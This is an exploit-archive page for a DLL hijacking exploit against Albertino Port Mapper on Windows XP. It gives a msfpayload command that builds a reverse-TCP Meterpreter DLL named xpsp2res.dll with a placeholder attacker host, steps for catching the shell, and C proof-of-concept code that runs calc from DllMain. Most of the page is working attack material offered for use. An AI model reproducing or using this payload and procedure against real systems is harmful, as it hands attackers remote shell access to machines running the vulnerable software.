facebook facebook twitter rss

Albertino Port Mapper DLL Hijacking Exploit (xpsp2res.dll)

Author: Bedo Mado , Published: 06-04-2015
/*
#[+] Author: Bedo Mado
#[+] Exploit Title: Albertino Port Mapper
#[+] Date: 3-4-2015
#[+] Type: Local Exploits
#[+] Vendor: http://www.geogensoft.com/software/10-port-mapper
#[+] Tested on: WinXpSp3
#[+]Infected Dll Library --> xpsp2res.dll
#[+]exploit with metasploit :>
(1)Make dll payload :> msfpayload windows/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=XXXX D > xpsp2res.dll
(3)start multi handler
(4)Execute The software
(5)Close The software
#[+] BOOOOOM !!!! Meterpreter sessions oppened
#[+] GR33TZ : Hassan Abd Elaziz - Kerolos Ezz - Toni - ViRus Os - Rami Kilwa - EgyptSoldiers - AnuBis Egy
#[+] facebook : fb.com/Bedo0.Mado0
#if you Want To Experience The Exploit. Copy it to the software dir. then execute the software , calc.exe will launch ^_^.
Proof of Concept (PoC):
============================
*/

#include <windows.h>

int Hijacked()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
Hijacked();
return 0;
}

Like us on Facebook :